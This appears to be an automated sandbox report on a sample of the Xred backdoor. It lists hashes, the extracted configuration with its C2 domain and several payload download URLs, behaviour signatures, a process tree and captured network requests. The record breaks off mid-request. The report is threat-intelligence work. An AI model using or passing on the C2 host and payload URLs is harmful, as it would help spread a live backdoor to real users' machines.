Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    94s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/01/2025, 16:32 UTC

General

  • Target

    98d15d74b36ebb0709c4a2f476088a5889fa548029dc90e7e0a070b1f36c4e56N.exe

  • Size

    793KB

  • MD5

    1951df1cc3262a172ce0bd85cc390d00

  • SHA1

    e88411f0b9155eec15712630de1a45b654f52eb3

  • SHA256

    98d15d74b36ebb0709c4a2f476088a5889fa548029dc90e7e0a070b1f36c4e56

  • SHA512

    e06061133c6e987fc53fc1cfb3ddf5394a8d13d8635221bb98dc177f4c794ac3cb3adcbed810d47f6e212cd6082b44021ae9dbe0c113a1bff31a7cda9347aad1

  • SSDEEP

    12288:mMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9TuQj:mnsJ39LyjbJkQFMhmC+6GD9ig

Malware Config

Extracted

Family

xred

C2

xred.mooo.com

Attributes
  • email

    xredline1@gmail.com

  • payload_url

    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

    http://xred.site50.net/syn/SUpdate.ini

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

    https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

    http://xred.site50.net/syn/Synaptics.rar

    https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

    http://xred.site50.net/syn/SSLLibrary.dll

Signatures

  • Xred

    Xred is backdoor written in Delphi.

  • Xred family
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 39 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\98d15d74b36ebb0709c4a2f476088a5889fa548029dc90e7e0a070b1f36c4e56N.exe
    "C:\Users\Admin\AppData\Local\Temp\98d15d74b36ebb0709c4a2f476088a5889fa548029dc90e7e0a070b1f36c4e56N.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:920
    • C:\Users\Admin\AppData\Local\Temp\._cache_98d15d74b36ebb0709c4a2f476088a5889fa548029dc90e7e0a070b1f36c4e56N.exe
      "C:\Users\Admin\AppData\Local\Temp\._cache_98d15d74b36ebb0709c4a2f476088a5889fa548029dc90e7e0a070b1f36c4e56N.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4672
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2828
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1808
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1188
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4588
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3900
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2604
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:5060
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4464
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4712
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1444
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:5080
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1100
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1792
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1728
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4952
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4140
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4408
      • C:\Windows\SysWOW64\cmd.exe
        cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4948
    • C:\ProgramData\Synaptics\Synaptics.exe
      "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:672
      • C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
        "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1816
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4856
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:540
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:884
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4160
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4452
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4040
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2840
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2588
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:216
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1736
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3240
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4616
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4972
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1544
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3456
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2544
        • C:\Windows\SysWOW64\cmd.exe
          cmd /K C:\Users\Admin\AppData\Local\Temp\mdcrack.exe -d
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1928
  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2132

Network

  • flag-us
    DNS
    241.150.49.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.150.49.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    DNS
    88.210.23.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    88.210.23.2.in-addr.arpa
    IN PTR
    Response
    88.210.23.2.in-addr.arpa
    IN PTR
    a2-23-210-88deploystaticakamaitechnologiescom
  • flag-us
    DNS
    133.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    240.76.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    240.76.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    xred.mooo.com
    Synaptics.exe
    Remote address:
    8.8.8.8:53
    Request
    xred.mooo.com
    IN A
    Response
  • flag-us
    DNS
    freedns.afraid.org
    Synaptics.exe
    Remote address:
    8.8.8.8:53
    Request
    freedns.afraid.org
    IN A
    Response
    freedns.afraid.org
    IN A
    69.42.215.252
  • flag-us
    GET
    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
    Synaptics.exe
    Remote address:
    69.42.215.252:80
    Request
    GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
    User-Agent: MyApp
    Host: freedns.afraid.org
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 01 Jan 2025 16:32:53 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    X-Cache: MISS
  • flag-us
    DNS
    196.249.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    196.249.167.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    252.215.42.69.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    252.215.42.69.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    252.215.42.69.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    252.215.42.69.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    49.192.11.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    49.192.11.51.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    197.87.175.4.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    197.87.175.4.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    171.39.242.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    171.39.242.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    92.12.20.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    92.12.20.2.in-addr.arpa
    IN PTR
    Response
    92.12.20.2.in-addr.arpa
    IN PTR
    a2-20-12-92deploystaticakamaitechnologiescom
  • flag-us
    DNS
    172.214.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.214.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    docs.google.com
    Synaptics.exe
    Remote address:
    8.8.8.8:53
    Request
    docs.google.com
    IN A
    Response
    docs.google.com
    IN A
    216.58.214.174
  • flag-fr
    GET
    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Synaptics.exe
    Remote address:
    216.58.214.174:443
    Request
    GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
    Response
    HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Wed, 01 Jan 2025 16:33:52 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Security-Policy: script-src 'report-sample' 'nonce-ElzVfNHDWgAcoJdgWfX5xw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-fr
    GET
    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Synaptics.exe
    Remote address:
    216.58.214.174:443
    Request
    GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
    Cookie: NID=520=J7i5n7HM2s8Q07qOtwCoMb2hcFceZckYBb4gF9M2jEm4sd5BCdxs92T50otl8_23_ccmSmHt0SPPQX1EWbi-kYUxuyZXbYNTW3t4iJhmHSlHkR1z7KX_lr-oDl775RwJj5ZFcWy91d8zF0xlPaBOEgzCLlhz2hnpEMBzCpAgRZDG150
    Response
    HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Wed, 01 Jan 2025 16:33:53 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-1Nfnc7eDlAOKrHu7EcyHSg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-fr
    GET
    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Synaptics.exe
    Remote address:
    216.58.214.174:443
    Request
    GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
    Cookie: NID=520=J7i5n7HM2s8Q07qOtwCoMb2hcFceZckYBb4gF9M2jEm4sd5BCdxs92T50otl8_23_ccmSmHt0SPPQX1EWbi-kYUxuyZXbYNTW3t4iJhmHSlHkR1z7KX_lr-oDl775RwJj5ZFcWy91d8zF0xlPaBOEgzCLlhz2hnpEMBzCpAgRZDG150
    Response
    HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Wed, 01 Jan 2025 16:33:54 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-iwdJI-4NRqPcuvIccx2MPw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-us
    DNS
    c.pki.goog
    Synaptics.exe
    Remote address:
    8.8.8.8:53
    Request
    c.pki.goog
    IN A
    Response
    c.pki.goog
    IN CNAME
    pki-goog.l.google.com
    pki-goog.l.google.com
    IN A
    142.250.179.67
  • flag-fr
    GET
    http://c.pki.goog/r/r1.crl
    Synaptics.exe
    Remote address:
    142.250.179.67:80
    Request
    GET /r/r1.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: c.pki.goog
    Response
    HTTP/1.1 200 OK
    Accept-Ranges: bytes
    Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
    Cross-Origin-Resource-Policy: cross-origin
    Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
    Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
    Content-Length: 854
    X-Content-Type-Options: nosniff
    Server: sffe
    X-XSS-Protection: 0
    Date: Wed, 01 Jan 2025 16:27:48 GMT
    Expires: Wed, 01 Jan 2025 17:17:48 GMT
    Cache-Control: public, max-age=3000
    Age: 364
    Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
    Content-Type: application/pkix-crl
    Vary: Accept-Encoding
  • flag-us
    DNS
    o.pki.goog
    Synaptics.exe
    Remote address:
    8.8.8.8:53
    Request
    o.pki.goog
    IN A
    Response
    o.pki.goog
    IN CNAME
    pki-goog.l.google.com
    pki-goog.l.google.com
    IN A
    142.250.179.67
  • flag-fr
    GET
    http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD8Elu9WzbqaxI7ClVJiEyf
    Synaptics.exe
    Remote address:
    142.250.179.67:80
    Request
    GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD8Elu9WzbqaxI7ClVJiEyf HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: o.pki.goog
    Response
    HTTP/1.1 200 OK
    Server: ocsp_responder
    Content-Length: 472
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Date: Wed, 01 Jan 2025 16:28:31 GMT
    Cache-Control: public, max-age=14400
    Content-Type: application/ocsp-response
    Age: 321
  • flag-fr
    GET
    http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDkqhDvrMuENxBpWocUnIUC
    Synaptics.exe
    Remote address:
    142.250.179.67:80
    Request
    GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDkqhDvrMuENxBpWocUnIUC HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: o.pki.goog
    Response
    HTTP/1.1 200 OK
    Server: ocsp_responder
    Content-Length: 472
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Date: Wed, 01 Jan 2025 15:34:20 GMT
    Cache-Control: public, max-age=14400
    Content-Type: application/ocsp-response
    Age: 3572
  • flag-us
    DNS
    drive.usercontent.google.com
    Synaptics.exe
    Remote address:
    8.8.8.8:53
    Request
    drive.usercontent.google.com
    IN A
    Response
    drive.usercontent.google.com
    IN A
    142.250.74.225
  • flag-fr
    GET
    https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Synaptics.exe
    Remote address:
    142.250.74.225:443
    Request
    GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC4wrWi4NCk5oiLsHp5orTwsG_RtlOisafSQeX1uU6bdWRMn7fAdRYjtUS7sHMtl-u9-
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Wed, 01 Jan 2025 16:33:53 GMT
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    Content-Security-Policy: script-src 'report-sample' 'nonce-v6B-Ocu60H_SqJAPZpwgTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Length: 1652
    Server: UploadServer
    Set-Cookie: NID=520=J7i5n7HM2s8Q07qOtwCoMb2hcFceZckYBb4gF9M2jEm4sd5BCdxs92T50otl8_23_ccmSmHt0SPPQX1EWbi-kYUxuyZXbYNTW3t4iJhmHSlHkR1z7KX_lr-oDl775RwJj5ZFcWy91d8zF0xlPaBOEgzCLlhz2hnpEMBzCpAgRZDG150; expires=Thu, 03-Jul-2025 16:33:53 GMT; path=/; domain=.google.com; HttpOnly
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
  • flag-fr
    GET
    https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Synaptics.exe
    Remote address:
    142.250.74.225:443
    Request
    GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=520=J7i5n7HM2s8Q07qOtwCoMb2hcFceZckYBb4gF9M2jEm4sd5BCdxs92T50otl8_23_ccmSmHt0SPPQX1EWbi-kYUxuyZXbYNTW3t4iJhmHSlHkR1z7KX_lr-oDl775RwJj5ZFcWy91d8zF0xlPaBOEgzCLlhz2hnpEMBzCpAgRZDG150
    Response
    HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC5fR97-fSUFz3f1yUTKqQo1rOVFvAHb52u7b1tCq5_5A23x9g8NWW_pFgqP59O0UnH4fHaLT1w
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Wed, 01 Jan 2025 16:33:53 GMT
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-e167fJ8mLyZbsRpVX3cCig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Content-Length: 1652
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
  • flag-fr
    GET
    https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Synaptics.exe
    Remote address:
    142.250.74.225:443
    Request
    GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
